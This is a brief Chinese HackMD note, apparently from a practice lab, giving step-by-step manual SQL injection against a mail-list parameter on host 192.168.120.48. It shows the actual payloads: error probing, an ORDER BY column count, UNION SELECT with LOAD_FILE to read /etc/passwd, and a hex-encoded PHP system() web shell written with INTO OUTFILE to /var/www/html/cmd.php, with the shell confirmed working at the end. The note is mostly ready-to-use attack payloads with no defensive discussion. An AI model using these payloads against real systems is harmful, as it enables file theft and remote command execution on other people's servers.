sql 手注 - HackMD

sql 手注用burp suite '會爆錯 ![image](https://hackmd.io/_uploads/HkNgQ3koll.png) 用' or 1-- //會過有注入點猜欄位數量 7個沒有 ![image](https://hackmd.io/_uploads/r1Savnyill.png) 6個有不會報錯 ![image](https://hackmd.io/_uploads/SJIRu2koeg.png) ' order by 6-- // 有6個欄位使用 'union select into outfile寫檔案 mail-list=23132132%40test.io' union select 1,2,3,4,LOAD_FILE('/etc/passwd'),6-- // 讀出/etc/passwd 做into outfile <?php system($_GET['cmd']); ?>做hex雜湊用notepad++轉外掛>ASCII to hex sql injection payload mail-list=23132132%40test.io' union select 1,2,3,4,0x3C3F7068702073797374656D28245F4745545B27636D64275D293B203F3E,6 INTO OUTFILE '/var/www/html/cmd.php'-- // 訪問192.168.120.48/cmd.php 成功寫入shell ![image](https://hackmd.io/_uploads/ryrfDnJjex.png)